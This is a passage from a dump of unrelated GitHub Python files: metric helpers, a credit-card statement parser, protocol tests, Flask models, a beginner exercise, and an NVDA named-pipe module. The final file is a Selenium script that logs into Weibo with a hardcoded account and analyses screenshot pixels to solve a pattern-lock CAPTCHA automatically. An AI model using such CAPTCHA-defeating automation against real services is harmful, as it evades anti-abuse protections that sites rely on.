pred_lbls.shape)\r\n \r\n # sum_F_squre = torch.square(pred_F + F)\r\n # dif_F_squre = torch.square(pred_F - F)\r\n # sum_sqrue1 = torch.mean(sum_F_squre,dim=1)\r\n # sum_sqrue2 = torch.mean(dif_F_squre,dim=1)\r\n # min_sqr = torch.minimum(sum_sqrue1,sum_sqrue2)\r\n # dif_F = torch.mean(min_sqr)\r\n\r\n n_batch = lbls.shape[0]\r\n pt_pairs_batch = lbls.shape[1]\r\n mask1 = pred_lbls > 0\r\n pred_lbls[mask1] = 1.0\r\n mask2 = pred_lbls < 0\r\n pred_lbls[mask2] = 0.0\r\n\r\n dif_lbls = abs(lbls - pred_lbls)\r\n precision = 1 - torch.sum(dif_lbls)/(n_batch*pt_pairs_batch)\r\n\r\n false_mask = (pred_lbls < 0.00001) & (lbls < 
0.00001)\r\n n_correct_false = torch.count_nonzero(false_mask)\r\n n_false = torch.count_nonzero(lbls < 0.00001)\r\n false_r = n_correct_false / n_false\r\n\r\n correct_mask = (pred_lbls > 0.00001) & (lbls > 0.00001)\r\n n_correct_true = torch.count_nonzero(correct_mask)\r\n n_correct = torch.count_nonzero(lbls > 0.00001)\r\n true_r = n_correct_true / n_correct\r\n\r\n\r\n return (precision, false_r, true_r)","repo_name":"csyhy1986/CE-net","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"26596181842","text":"import os\r\nimport pandas as pd\r\nfrom tabula import read_pdf\r\nimport tabula\r\nfrom utility import *\r\n\r\nexclude = [\"bosluk\", \"bos\", \"MILES&SMILES PROGRAM ORTAKLARI DIŞI HARCAMALARINIZ\", \"GİYİM\", \"DİĞER\"]\r\n\r\n\r\ndef garantiExcluded(text):\r\n for e in exclude:\r\n if e in text:\r\n return True\r\n return False\r\n\r\n\r\ndef parse_Garanti(filename: str):\r\n data = read_pdf(filename, pages=\"all\")\r\n data = data[0]\r\n data.to_csv(\"example.tsv\", index=False, header=None, sep='\\t')\r\n\r\n output = []\r\n for line in readTextFile(\"example.tsv\"):\r\n if not garantiExcluded(line):\r\n line = line.split(\"\\t\")\r\n desc = line[1]\r\n desc = desc[15:]\r\n line.pop(0)\r\n line.pop(0)\r\n line.pop(0)\r\n line.pop(0)\r\n line = [l for l in line if len(l) > 0]\r\n line = line[0]\r\n line = line.replace(\".\", \"\")\r\n line = float(line.replace(\",\", \".\"))\r\n if line > 0.0:\r\n output.append((desc, line))\r\n #: Delete the tsv file\r\n os.remove(\"example.tsv\")\r\n #: Return\r\n return output\r\n\r\n\r\nx = parse_Garanti(\"garanti.pdf\")\r\nfor key,value in x:\r\n print(str(key).lstrip(),\":\",value)\r\n ","repo_name":"srprkrbs1/ReadingCreditCardBill","sub_path":"garanti.py","file_name":"garanti.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34077273770","text":"import unittest\nimport socket\nfrom threading import Thread\nfrom collections import OrderedDict\n\nfrom scscp import client\nfrom scscp.client import SCSCPClientBase\nfrom scscp.server import SCSCPServerBase\n\nclass TestConnInit(unittest.TestCase):\n def setUp(self):\n server, client = socket.socketpair()\n self.client = SCSCPClientBase(client)\n self.server = SCSCPServerBase(server, name=b'Test', version=b'none', id=b'test-id')\n\n def test_successful(self):\n \"\"\" Test a successful connection initiation \"\"\"\n t = Thread(target=self.server.accept)\n t.start()\n self.client.connect()\n t.join()\n\n self.assertEqual(self.client.status, client.CONNECTED, \"Connected\")\n self.assertEqual(OrderedDict(self.client.service_info.items()),\n OrderedDict([\n ('service_name', b'Test'),\n ('service_version', b'none'),\n ('service_id', b'test-id'),\n ('scscp_versions', b'1.3')\n ]), \"Connected\")\n \n self.client.quit()\n self.assertEqual(self.client.status, client.CLOSED, \"Quitted\")\n\n def test_msg(self):\n \"\"\" Test a message exchange \"\"\"\n t = Thread(target=self.server.accept)\n t.start()\n self.client.connect()\n t.join()\n \n self.client.send(b\"Hello world!\")\n\n msg = self.server.receive()\n self.assertEqual(msg, b\"\\nHello world!\\n\")\n \n self.server.send(msg)\n msg = self.client.receive()\n self.assertEqual(msg, b\"\\n\\nHello world!\\n\\n\")\n\n self.server.quit()\n self.assertEqual(self.server.status, client.CLOSED, 
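        # Aside: socket.socketpair() used in setUp returns two already
        # connected sockets, so the SCSCP handshake is unit-tested fully
        # in-process; a Thread drives server.accept() concurrently with
        # client.connect(). Minimal illustration of the same pattern:
        #     s, c = socket.socketpair()
        #     Thread(target=lambda: s.sendall(b"hi")).start()
        #     assert c.recv(2) == b"hi"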
\"Quitted\")\n","repo_name":"OpenMath/py-scscp","sub_path":"tests/test_conn_init.py","file_name":"test_conn_init.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"31651275654","text":"import os\nfrom sqlalchemy import Column, String, Integer, \\\n create_engine, ForeignKey, DateTime, Table\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\nfrom datetime import date\n# from flask import abort\n\nfrom sqlalchemy.orm import relationship\n\ndatabase_path = os.environ['DATABASE_URL']\ndb = SQLAlchemy()\n\n'''\nsetup_db(app)\n binds a flask application and a SQLAlchemy service\n'''\n\n\ndef setup_db(app, database_path=database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\n'''\nShow\n'''\n\nshows_table = Table('shows', db.metadata,\n Column('actors_id', Integer,\n ForeignKey('actors.id'), nullable=False),\n Column('movies_id', Integer,\n ForeignKey('movies.id'), nullable=False)\n )\n\n\n'''\nMovie\n\n'''\n\n\nclass Movie(db.Model):\n __tablename__ = 'movies'\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n release_date = Column(DateTime)\n # actors = relationship('Actor', backref='movies', lazy=True)\n actors = relationship(\"Actor\",\n secondary=shows_table,\n back_populates=\"movies\")\n\n def __init__(self, title, release_date):\n self.title = title\n self.release_date = release_date\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def update(self):\n try:\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def format(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'release_date': self.release_date\n }\n\n\n'''\nActor\n\n'''\n\n\nclass Actor(db.Model):\n __tablename__ = 'actors'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n gender = Column(String)\n birth_date = Column(DateTime)\n # movies = relationship('Movie', backref='actors', lazy=True)\n movies = relationship(\"Movie\",\n secondary=shows_table,\n back_populates=\"actors\")\n\n def __init__(self, name, gender, birth_date):\n self.name = name\n self.gender = gender\n self.birth_date = birth_date\n\n def insert(self):\n try:\n db.session.add(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def update(self):\n try:\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def delete(self):\n try:\n db.session.delete(self)\n db.session.commit()\n except Exception:\n db.session.rollback()\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'gender': self.gender,\n 'birth_date': self.birth_date\n }\n\n\n\"\"\"\nclass Show(db.Model):\n __tablename__ = 'shows'\n\n id = Column(Integer, primary_key=True)\n actor_id = Column(Integer, ForeignKey('actors.id'), nullable=False)\n movie_id = Column(Integer, ForeignKey('movies.id'), nullable=False)\n\"\"\"\n","repo_name":"mesh3l-966/capstone","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21455279803","text":"import pdb\n\n\n# for realizada uma pesquisa de algumas caracteristicas e gostos de 
quatro habitantes incluindo:\n# nome, sexo, esporte favorito (natação, futebol volei e tenis) e idade.\n#com esses dados faça:\n\n#função que armazene os dados em uma lista. Dica: use dicionarios dentro da lista.\n\n# calcule a idade média de homens que gostam de natação. Caso não haja homens que gostam de natação chame uma função e imprima um aviso de que não há homens que gostam de natação\n\n# minha resolução\n\n\nlista = []\n\ndef pesquisa(lista):\n nome = input('Digite seu nome: ')\n idade = int(input('Digite sua idade: '))\n sexo = input('Digite: M para sexo masculino e F para sexo feminino: ')\n sexoEscolhido = sexo.upper()\n esporte = input('Digite seu esporte favorito dentre (natação, futebol volei e tenis) : ')\n esporteEscolhido = esporte.upper()\n candidado = input('Existem mais candidatos? S para sim e N para não: ')\n proximoCandidato = candidado.upper()\n \n dicionario = dict(nome=nome,idade=idade,sexo=sexoEscolhido,esporteFavorito=esporteEscolhido)\n\n lista.append(dicionario)\n \n if proximoCandidato == 'S':\n pesquisa(lista)\n else:\n return \n \n \npesquisa(lista)\n\nprint(lista)\nprint('\\n')\n\n# mascNatacao = []\n\n# for item in lista:\n# if item['esporteFavorito'] == 'NATACAO' and item['sexo'] == 'M':\n# mascNatacao.append(item['esporteFavorito'])\n\n# print(mascNatacao.count('NATACAO'))\n\n\nmasc = list(filter(lambda item: item['esporteFavorito'] == 'NATACAO' and item['sexo'] == 'M', lista))\n\n\nprint(f'O total de homens que gostam de natação é igual a {len(masc)}')\n\n\nsoma = sum(n['idade'] for n in masc)\n\nmedia = soma / len(masc)\n\nprint(media)\n\n\n\n\n\n\n\n# resolução professor\n\ndef cadastro():\n list = []\n for i in range(4):\n dicionario = dict(nome = input('Digite seu nome: '),\n sexo = input('digite M para masculino e F para feminino'),\n esporte = input('Digite seu esporte favorito'),\n idade = int(input('Digite sua idade: ')))\n list.append(dicionario)\n return list\n \n \nlista = cadastro()\n \ncont = 0\nsoma = 0\n\nprint(lista)\n\ndef aviso():\n print('Nenhum homem gosta de natação!')\n\nfor indice,item in enumerate(len(lista)):\n if lista[indice]['sexo'] == 'M' and lista[indice]['esporte'] == \"natacao\":\n soma = soma + lista[indice]['idade']\n cont += 1\n\nif cont == 0:\n aviso()\nelse:\n media = soma / cont\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"castrintt/curso-python","sub_path":"funcoes/exercicio-funcao-sem-parametro.py","file_name":"exercicio-funcao-sem-parametro.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39791024671","text":"from decorators import check_for_name, only_strings\n\n@check_for_name\ndef print_my_name(greeting, my_name):\n print(\"----------print_my_name()\")\n print(f\"{greeting}, {my_name}\")\n\n@only_strings\ndef concat(a,b,c):\n result = a + b + c\n print(result)\n return result","repo_name":"BadArce/flask2-1","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17030348161","text":"class Process:\n def __init__(self, num=0, arrivalTime=0, burstTime=0, priority=0):\n self.num = num\n self.arrivalTime = arrivalTime\n self.burstTime = burstTime\n self.remaining = burstTime\n self.last = arrivalTime\n self.priority = priority\n self.status = 1 # 1 means active 0 means not active\n self.tat = 0\n self.waitingTime = 0\n self.weightedTAT = 0\n\n\ndef 
main():\n p = Process()\n print(vars(p))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MoamenAttia/Operating-Systems-Project","sub_path":"code files/Process.py","file_name":"Process.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14447547434","text":"import os\nfrom ctypes import (\n\tPOINTER,\n\tGetLastError,\n\tWinError,\n\tbyref,\n\tc_ulong,\n\tsizeof,\n\twindll,\n)\nfrom ctypes.wintypes import BOOL, DWORD, HANDLE, LPCWSTR\nfrom enum import IntFlag\nfrom glob import iglob\nfrom typing import Callable, Iterator, Optional, Union\n\nimport winKernel\nfrom appModuleHandler import processEntry32W\nfrom hwIo.base import IoBase\nfrom hwIo.ioThread import IoThread\nfrom logHandler import log\nfrom serial.win32 import (\n\tERROR_IO_PENDING,\n\tFILE_FLAG_OVERLAPPED,\n\tINVALID_HANDLE_VALUE,\n\tLPOVERLAPPED,\n\tOVERLAPPED,\n\tCreateFile,\n)\n\nfrom .ioThreadEx import IoThreadEx\n\nERROR_INVALID_HANDLE = 0x6\nERROR_PIPE_CONNECTED = 0x217\nERROR_PIPE_BUSY = 0xE7\nPIPE_DIRECTORY = \"\\\\\\\\?\\\\pipe\\\\\"\nRD_PIPE_GLOB_PATTERN = os.path.join(PIPE_DIRECTORY, \"RdPipe_NVDA-*\")\nSECURE_DESKTOP_GLOB_PATTERN = os.path.join(PIPE_DIRECTORY, \"NVDA_SD-*\")\nTH32CS_SNAPPROCESS = 0x00000002\nwindll.kernel32.CreateNamedPipeW.restype = HANDLE\nwindll.kernel32.CreateNamedPipeW.argtypes = (\n\tLPCWSTR,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tPOINTER(winKernel.SECURITY_ATTRIBUTES),\n)\nwindll.kernel32.ConnectNamedPipe.restype = BOOL\nwindll.kernel32.ConnectNamedPipe.argtypes = (HANDLE, LPOVERLAPPED)\nwindll.kernel32.DisconnectNamedPipe.restype = BOOL\nwindll.kernel32.DisconnectNamedPipe.argtypes = (HANDLE,)\n\n\ndef getParentProcessId(processId: int) -> Optional[int]:\n\tFSnapshotHandle = windll.kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n\ttry:\n\t\tFProcessEntry32 = processEntry32W()\n\t\tFProcessEntry32.dwSize = sizeof(processEntry32W)\n\t\tContinueLoop = windll.kernel32.Process32FirstW(FSnapshotHandle, byref(FProcessEntry32))\n\t\twhile ContinueLoop:\n\t\t\tif FProcessEntry32.th32ProcessID == processId:\n\t\t\t\treturn FProcessEntry32.th32ParentProcessID\n\t\t\tContinueLoop = windll.kernel32.Process32NextW(FSnapshotHandle, byref(FProcessEntry32))\n\t\telse:\n\t\t\treturn None\n\tfinally:\n\t\twindll.kernel32.CloseHandle(FSnapshotHandle)\n\n\ndef getNamedPipes() -> Iterator[str]:\n\tyield from iglob(os.path.join(PIPE_DIRECTORY, \"*\"))\n\n\ndef getRdPipeNamedPipes() -> Iterator[str]:\n\tyield from iglob(RD_PIPE_GLOB_PATTERN)\n\n\ndef getSecureDesktopNamedPipes() -> Iterator[str]:\n\tyield from iglob(SECURE_DESKTOP_GLOB_PATTERN)\n\n\nclass PipeMode(IntFlag):\n\tREADMODE_BYTE = 0x00000000\n\tREADMODE_MESSAGE = 0x00000002\n\tWAIT = 0x00000000\n\tNOWAIT = 0x00000001\n\n\nclass PipeOpenMode(IntFlag):\n\tACCESS_DUPLEX = 0x00000003\n\tACCESS_INBOUND = 0x00000001\n\tACCESS_OUTBOUND = 0x00000002\n\tFIRST_PIPE_INSTANCE = 0x00080000\n\tWRITE_THROUGH = 0x80000000\n\tOVERLAPPED = FILE_FLAG_OVERLAPPED\n\tWRITE_DAC = 0x00040000\n\tWRITE_OWNER = 0x00080000\n\tACCESS_SYSTEM_SECURITY = 0x01000000\n\n\nMAX_PIPE_MESSAGE_SIZE = 1024 * 64\n\n\nclass NamedPipeBase(IoBase):\n\tpipeProcessId: Optional[int] = None\n\tpipeParentProcessId: Optional[int] = None\n\tpipeMode: PipeMode = PipeMode.READMODE_BYTE | PipeMode.WAIT\n\tpipeName: str\n\n\tdef __init__(\n\t\tself,\n\t\tpipeName: str,\n\t\tfileHandle: Union[HANDLE, int],\n\t\tonReceive: Callable[[bytes], None],\n\t\tonReceiveSize: 
int = MAX_PIPE_MESSAGE_SIZE,\n\t\tonReadError: Optional[Callable[[int], bool]] = None,\n\t\tioThread: Optional[IoThread] = None,\n\t\tpipeMode: PipeMode = PipeMode.READMODE_BYTE,\n\t):\n\t\tself.pipeName = pipeName\n\t\tself.pipeMode = pipeMode\n\t\tsuper().__init__(\n\t\t\tfileHandle,\n\t\t\tonReceive,\n\t\t\tonReceiveSize=onReceiveSize,\n\t\t\tonReadError=onReadError,\n\t\t\tioThread=ioThread,\n\t\t)\n\n\tdef _get_isAlive(self) -> bool:\n\t\treturn self.pipeName in getNamedPipes()\n\n\nclass NamedPipeServer(NamedPipeBase):\n\t_connected: bool = False\n\t_onConnected: Optional[Callable[[bool], None]] = None\n\t_waitObject: Optional[HANDLE] = None\n\t_connectOl: Optional[OVERLAPPED] = None\n\n\tdef __init__(\n\t\tself,\n\t\tpipeName: str,\n\t\tonReceive: Callable[[bytes], None],\n\t\tonReceiveSize: int = MAX_PIPE_MESSAGE_SIZE,\n\t\tonConnected: Optional[Callable[[bool], None]] = None,\n\t\tioThreadEx: Optional[IoThreadEx] = None,\n\t\tpipeMode: PipeMode = PipeMode.READMODE_BYTE,\n\t\tpipeOpenMode: PipeOpenMode = (\n\t\t\tPipeOpenMode.ACCESS_DUPLEX | PipeOpenMode.OVERLAPPED | PipeOpenMode.FIRST_PIPE_INSTANCE\n\t\t),\n\t\tmaxInstances: int = 1,\n\t):\n\t\tlog.debug(f\"Initializing named pipe: Name={pipeName}\")\n\t\tfileHandle = windll.kernel32.CreateNamedPipeW(\n\t\t\tpipeName,\n\t\t\tpipeOpenMode,\n\t\t\tpipeMode,\n\t\t\tmaxInstances,\n\t\t\tonReceiveSize,\n\t\t\tonReceiveSize,\n\t\t\t0,\n\t\t\tNone,\n\t\t)\n\t\tif fileHandle == INVALID_HANDLE_VALUE:\n\t\t\traise WinError()\n\t\tlog.debug(f\"Initialized named pipe: Name={pipeName}, handle={fileHandle}\")\n\t\tself._onConnected = onConnected\n\t\tsuper().__init__(\n\t\t\tpipeName,\n\t\t\tfileHandle,\n\t\t\tonReceive,\n\t\t\tonReadError=self._onReadError,\n\t\t\tioThread=ioThreadEx,\n\t\t\tpipeMode=pipeMode,\n\t\t)\n\n\tdef _handleConnect(self):\n\t\tself._connectOl = ol = OVERLAPPED()\n\t\tol.hEvent = self._recvEvt\n\t\tlog.debug(f\"Connecting server end of named pipe: Name={self.pipeName}\")\n\t\tconnectRes = windll.kernel32.ConnectNamedPipe(self._file, byref(ol))\n\t\terror: int = GetLastError()\n\t\tif error == ERROR_PIPE_CONNECTED:\n\t\t\tlog.debug(f\"Server end of named pipe {self.pipeName} already connected\")\n\t\t\twindll.kernel32.SetEvent(self._recvEvt)\n\t\telse:\n\t\t\tif not connectRes and error != ERROR_IO_PENDING:\n\t\t\t\tlog.error(f\"Error while calling ConnectNamedPipe for {self.pipeName}: {WinError(error)}\")\n\t\t\t\tself._ioDone(error, 0, byref(ol))\n\t\t\t\treturn\n\t\t\tlog.debug(f\"Named pipe {self.pipeName} pending client connection\")\n\t\ttry:\n\t\t\tself._ioThreadRef().waitForSingleObjectWithCallback(self._recvEvt, self._handleConnectCallback)\n\t\texcept OSError as e:\n\t\t\terror = e.winerror\n\t\t\tlog.error(\n\t\t\t\tf\"Error while calling RegisterWaitForSingleObject for {self.pipeName}: {WinError(error)}\"\n\t\t\t)\n\t\t\tself._ioDone(error, 0, byref(ol))\n\n\tdef _handleConnectCallback(self, _parameter: int, _timerOrWaitFired: bool):\n\t\tlog.debug(f\"Event set for {self.pipeName}\")\n\t\tnumberOfBytes = DWORD()\n\t\tlog.debug(f\"Getting overlapped result for {self.pipeName} after wait for event\")\n\t\tif not windll.kernel32.GetOverlappedResult(\n\t\t\tself._file, byref(self._connectOl), byref(numberOfBytes), False\n\t\t):\n\t\t\terror = GetLastError()\n\t\t\tlog.debug(f\"Error while getting overlapped result for {self.pipeName}: {WinError(error)}\")\n\t\t\tself._ioDone(error, 0, byref(self._connectOl))\n\t\t\treturn\n\t\tself._connected = True\n\t\tlog.debug(f\"Successfully connected {self.pipeName}, 
handling post connection logic\")\n\t\tclientProcessId = c_ulong()\n\t\tif not windll.kernel32.GetNamedPipeClientProcessId(HANDLE(self._file), byref(clientProcessId)):\n\t\t\traise WinError()\n\t\tself.pipeProcessId = clientProcessId.value\n\t\tself.pipeParentProcessId = getParentProcessId(self.pipeProcessId)\n\t\tself._initialRead()\n\t\tif self._onConnected is not None:\n\t\t\tself._onConnected(True)\n\t\tlog.debug(f\"End of handleConnectCallback for {self.pipeName}\")\n\t\tself._connectOl = None\n\n\tdef _onReadError(self, error: int):\n\t\twinErr = WinError(error)\n\t\tlog.debug(f\"Read error: {winErr}\")\n\t\tif isinstance(winErr, BrokenPipeError):\n\t\t\tself.disconnect()\n\t\t\tself._initialRead()\n\t\t\treturn True\n\t\treturn False\n\n\tdef _asyncRead(self, _param: Optional[int] = None):\n\t\tif not self._connected:\n\t\t\t# _handleConnect will call _asyncRead when it is finished.\n\t\t\tself._handleConnect()\n\t\telse:\n\t\t\tsuper()._asyncRead()\n\n\tdef disconnect(self):\n\t\tif not windll.kernel32.DisconnectNamedPipe(self._file):\n\t\t\traise WinError()\n\t\tself._connected = False\n\t\tself.pipeProcessId = None\n\t\tself.pipeParentProcessId = None\n\t\tif self._onConnected:\n\t\t\tself._onConnected(False)\n\n\tdef close(self):\n\t\tsuper().close()\n\t\tif hasattr(self, \"_file\") and self._file is not INVALID_HANDLE_VALUE:\n\t\t\tself.disconnect()\n\t\t\tself._onConnected = None\n\t\t\twinKernel.closeHandle(self._file)\n\t\t\tself._file = INVALID_HANDLE_VALUE\n\n\t@property\n\tdef _ioDone(self):\n\t\treturn super()._ioDone\n\n\t@_ioDone.setter\n\tdef _ioDone(self, value):\n\t\t\"\"\"Hack, we don't want _ioDone to set itself to None.\"\"\"\n\t\tpass\n\n\nclass NamedPipeClient(NamedPipeBase):\n\tdef __init__(\n\t\tself,\n\t\tpipeName: str,\n\t\tonReceive: Callable[[bytes], None],\n\t\tonReadError: Optional[Callable[[int], bool]] = None,\n\t\tioThread: Optional[IoThread] = None,\n\t\tpipeMode: PipeMode = PipeMode.READMODE_BYTE,\n\t):\n\t\tfileHandle = CreateFile(\n\t\t\tpipeName,\n\t\t\twinKernel.GENERIC_READ | winKernel.GENERIC_WRITE,\n\t\t\t0,\n\t\t\tNone,\n\t\t\twinKernel.OPEN_EXISTING,\n\t\t\tFILE_FLAG_OVERLAPPED,\n\t\t\tNone,\n\t\t)\n\t\tif fileHandle == INVALID_HANDLE_VALUE:\n\t\t\traise WinError()\n\t\ttry:\n\t\t\tif pipeMode:\n\t\t\t\tdwPipeMode = DWORD(pipeMode)\n\t\t\t\tif not windll.kernel32.SetNamedPipeHandleState(fileHandle, byref(dwPipeMode), 0, 0):\n\t\t\t\t\traise WinError()\n\t\t\tserverProcessId = c_ulong()\n\t\t\tif not windll.kernel32.GetNamedPipeServerProcessId(HANDLE(fileHandle), byref(serverProcessId)):\n\t\t\t\traise WinError()\n\t\t\tself.pipeProcessId = serverProcessId.value\n\t\t\tself.pipeParentProcessId = getParentProcessId(self.pipeProcessId)\n\t\texcept Exception:\n\t\t\twinKernel.closeHandle(fileHandle)\n\t\t\traise\n\t\tsuper().__init__(\n\t\t\tpipeName,\n\t\t\tfileHandle,\n\t\t\tonReceive,\n\t\t\tonReadError=onReadError,\n\t\t\tioThread=ioThread,\n\t\t\tpipeMode=pipeMode,\n\t\t)\n\n\tdef close(self):\n\t\tsuper().close()\n\t\tif hasattr(self, \"_file\") and self._file is not INVALID_HANDLE_VALUE:\n\t\t\twinKernel.closeHandle(self._file)\n\t\t\tself._file = INVALID_HANDLE_VALUE\n","repo_name":"leonardder/rdAccess","sub_path":"addon/lib/namedPipe.py","file_name":"namedPipe.py","file_ext":"py","file_size_in_byte":9030,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"29647747519","text":"# -*- coding:utf-8 -*-\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import 
By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver import ActionChains\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\nimport time\r\n\r\nURL = 'https://passport.weibo.cn/signin/login';\r\nUSERNAME = 'htywork_3@sina.com';\r\nPASSWORD = 'htywork_3';\r\n\r\nclass weibogg():\r\n def __init__(self):\r\n chrome_options = webdriver.ChromeOptions();\r\n chrome_options.add_argument('start-maximized');\r\n self.browser = webdriver.Chrome(chrome_options=chrome_options);\r\n self.wait = WebDriverWait(self.browser, 20);\r\n \r\n def initpage(self):\r\n self.browser.get(URL);\r\n input_user = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#loginName')));\r\n input_pass = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#loginPassword')));\r\n login_btn = self.wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#loginAction')));\r\n time.sleep(1);\r\n input_user.clear();\r\n input_user.send_keys(USERNAME);\r\n time.sleep(1);\r\n input_pass.clear();\r\n input_pass.send_keys(PASSWORD);\r\n time.sleep(1);\r\n login_btn.click();\r\n time.sleep(3); \r\n \r\n def get_direction_zb1(self, circles, index1, index2):\r\n x1 = circles[index1].location['x'] + circles[index1].size['width']/2;\r\n y1 = circles[index1].location['y'] + circles[index1].size['height']/2;\r\n x2 = circles[index2].location['x'] + circles[index2].size['width']/2;\r\n y2 = circles[index2].location['y'] + circles[index2].size['height']/2;\r\n cx = x1 + (x2-x1)/2;\r\n cy = y1 + (y2-y1)/2;\r\n return(cx, cy);\r\n \r\n def get_direction_zb2(self, circles, index1, index2):\r\n x1 = circles[index1].location['x'] + circles[index1].size['width']/2;\r\n y1 = circles[index1].location['y'] + circles[index1].size['height']/2;\r\n x2 = circles[index2].location['x'] + circles[index2].size['width']/2;\r\n y2 = circles[index2].location['y'] + circles[index2].size['height']/2;\r\n if x2 > x1 and y2 > y1: \r\n cx1 = x1 + (x2-x1)*0.3;\r\n cy1 = y1 + (y2-y1)*0.3;\r\n cx2 = x1 + (x2-x1)*0.5;\r\n cy2 = y1 + (y2-y1)*0.5;\r\n cx3 = x1 + (x2-x1)*0.7;\r\n cy3 = y1 + (y2-y1)*0.7;\r\n else:\r\n cx1 = x1 + (x2-x1)*0.3;\r\n cy1 = y2 + (y1-y2)*0.7;\r\n cx2 = x1 + (x2-x1)*0.5;\r\n cy2 = y2 + (y1-y2)*0.5;\r\n cx3 = x1 + (x2-x1)*0.7;\r\n cy3 = y2 + (y1-y2)*0.3;\r\n return(cx1, cy1, cx2, cy2, cx3, cy3);\r\n \r\n def get_directions_zb(self):\r\n directions = [];\r\n circles = None;\r\n while not circles:\r\n circles = self.browser.find_elements_by_css_selector('.patt-wrap .patt-circ');\r\n cx, cy = self.get_direction_zb1(circles, 0, 1);\r\n directions.append((cx, cy));\r\n cx, cy = self.get_direction_zb1(circles, 1, 3);\r\n directions.append((cx, cy));\r\n cx, cy = self.get_direction_zb1(circles, 2, 3);\r\n directions.append((cx, cy));\r\n cx, cy = self.get_direction_zb1(circles, 0, 2);\r\n directions.append((cx, cy));\r\n cx1, cy1, cx2, cy2, cx3, cy3 = self.get_direction_zb2(circles, 0, 3);\r\n directions.append((cx1, cy1));\r\n directions.append((cx2, cy2));\r\n directions.append((cx3, cy3));\r\n cx1, cy1, cx2, cy2, cx3, cy3 = self.get_direction_zb2(circles, 2, 1);\r\n directions.append((cx1, cy1));\r\n directions.append((cx2, cy2));\r\n directions.append((cx3, cy3));\r\n return directions;\r\n \r\n def get_screenshot(self):\r\n screenshot = self.browser.get_screenshot_as_png();\r\n screenshot = 
Image.open(BytesIO(screenshot));\r\n return screenshot;\r\n \r\n def convert_greyimg(self, image):\r\n image = image.convert('L');\r\n return image;\r\n \r\n def convert_binaryimg(self, image):\r\n threshold = 250; \r\n table = [];\r\n for i in range(256):\r\n if i < threshold:\r\n table.append(0);\r\n else:\r\n table.append(1);\r\n image = image.point(table,'1');\r\n return image;\r\n \r\n def convert_img2pixel(self, image):\r\n datas = data = [];\r\n datas = []\r\n for y in range(image.height):\r\n for x in range(image.width):\r\n rgb = image.load()[x, y];\r\n if rgb < 253:\r\n data.append(image.load()[x, y]);\r\n else:\r\n data.append(0);\r\n havedata_inline = 0;\r\n for pixel in data:\r\n if pixel > 0:\r\n havedata_inline = 1;\r\n break;\r\n if havedata_inline > 0:\r\n datas.append(list(data));\r\n data = [];\r\n return datas;\r\n \r\n def determin_direction(self, datas, type):\r\n if len(datas) > 0:\r\n if type == 1:\r\n first_greater0_col = 0;\r\n second_greater0_col = 0;\r\n data1 = datas[0];\r\n data2 = datas[1];\r\n for n in range(len(data1)):\r\n if data1[n] > 0:\r\n first_greater0_col = n;\r\n break;\r\n for n in range(len(data2)):\r\n if data2[n] > 0:\r\n second_greater0_col = n;\r\n break;\r\n if first_greater0_col == second_greater0_col:\r\n return 'l-r';\r\n else:\r\n return 'r-l';\r\n elif type == 2:\r\n rows = len(datas);\r\n columns = len(datas[0]);\r\n first_greater0_row = 0;\r\n second_greater0_row = 0;\r\n for col in range(columns):\r\n for row in range(rows):\r\n if datas[row][col] > 0:\r\n if first_greater0_row == 0:\r\n first_greater0_row = row;\r\n break;\r\n else:\r\n second_greater0_row = row;\r\n break;\r\n if first_greater0_row > 0 and second_greater0_row > 0:\r\n break;\r\n if first_greater0_row == second_greater0_row:\r\n return 't-b';\r\n else:\r\n return 'b-t';\r\n elif type == 3:\r\n zerocnt = 0;\r\n for row in range(len(datas)):\r\n for col in range(len(datas[0])):\r\n if datas[row][col] == 0:\r\n zerocnt += 1;\r\n if zerocnt <= 10:\r\n return 